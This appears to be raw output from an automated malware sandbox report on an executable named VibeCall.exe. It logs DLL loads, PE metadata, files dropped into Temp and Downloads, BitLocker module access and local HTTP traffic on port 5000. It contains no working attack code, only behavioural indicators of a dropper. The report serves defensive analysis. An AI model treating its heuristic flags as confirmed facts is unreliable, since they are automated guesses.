Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\VibeCall.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: VibeCall.exe Static PE information: certificate valid
Source: VibeCall.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: VibeCall.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: VibeCall.exe Static file information: File size 71219064 > 1048576
Source: VibeCall.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x61ac00
Source: VibeCall.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17ca00
Source: VibeCall.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x172800
Source: VibeCall.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: VibeCall.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: VibeCall.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: VibeCall.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: VibeCall.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: VibeCall.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: VibeCall.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: VibeCall.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wkernel32.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2441501280.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441359757.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441848134.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2440187618.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2440417244.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2440806354.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441027923.0000000003C60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2440187618.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2440417244.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2440806354.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441027923.0000000003C60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: wkernelbase.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441848134.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2441501280.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441359757.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1698594920.00007FF735F42000.00000002.00000001.01000000.00000003.sdmp
Source: VibeCall.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: VibeCall.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: VibeCall.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: VibeCall.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: VibeCall.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: VibeCall.exe Static PE information: section name: .CLR_UEF
Source: VibeCall.exe Static PE information: section name: .didat
Source: VibeCall.exe Static PE information: section name: Section
Source: VibeCall.exe Static PE information: section name: _RDATA
Source: soundsolution_vibecall_c.exe.0.dr Static PE information: section name: .fptable
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B35D2A5 pushad ; iretd 2_2_00007FFD9B35D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B542316 push 8B485F92h; iretd 2_2_00007FFD9B54231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B470D20 push eax; retf 4_2_00007FFD9B470D4D
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_013D19B4 push ecx; ret 14_3_013D19C7
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_01644D5E push esi; ret 14_3_01644D69
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_016421DC push eax; ret 14_3_016421DD
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_01642C39 push ecx; ret 14_3_01642C59
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_016428EC push edi; ret 14_3_016428F8
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_016410F9 push FFFFFF82h; iretd 14_3_016410FB
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_016444F9 push edx; retf 14_3_016444FC
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_01640F6A push eax; ret 14_3_01640F75
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_01643FD4 push ss; retf 14_3_01643FF5
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_01643F89 push edi; iretd 14_3_01643F96
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_3_0164525D push es; ret 14_3_01645264
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_2_01640F6A push eax; ret 14_2_01640F75
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_2_01644D5E push esi; ret 14_2_01644D69
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_2_01643FD4 push ss; retf 14_2_01643FF5
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_2_016421DC push eax; ret 14_2_016421DD
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_2_01643F89 push edi; iretd 14_2_01643F96
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_2_0164525D push es; ret 14_2_01645264
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_2_01642C39 push ecx; ret 14_2_01642C59
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_2_016428EC push edi; ret 14_2_016428F8
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_2_016410F9 push FFFFFF82h; iretd 14_2_016410FB
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe Code function: 14_2_016444F9 push edx; retf 14_2_016444FC
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe Code function: 15_3_016319B4 push ecx; ret 15_3_016319C7
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe Code function: 15_3_02F2525D push es; ret 15_3_02F25264
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe Code function: 15_3_02F23FD4 push ss; retf 15_3_02F23FF5
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe Code function: 15_3_02F23F89 push edi; iretd 15_3_02F23F96
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe Code function: 15_3_02F20F6A push eax; ret 15_3_02F20F75
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe Code function: 15_3_02F210F9 push FFFFFF82h; iretd 15_3_02F210FB
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe Code function: 15_3_02F244F9 push edx; retf 15_3_02F244FC
Source: C:\Users\user\Desktop\VibeCall.exe File created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe
Source: C:\Users\user\Desktop\VibeCall.exe File created: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe
Source: C:\Users\user\Desktop\VibeCall.exe File created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe
Source: C:\Users\user\Desktop\VibeCall.exe File created: C:\Users\user\Downloads\videosolution_vibecall_b.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49751
Source: C:\Users\user\Desktop\VibeCall.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
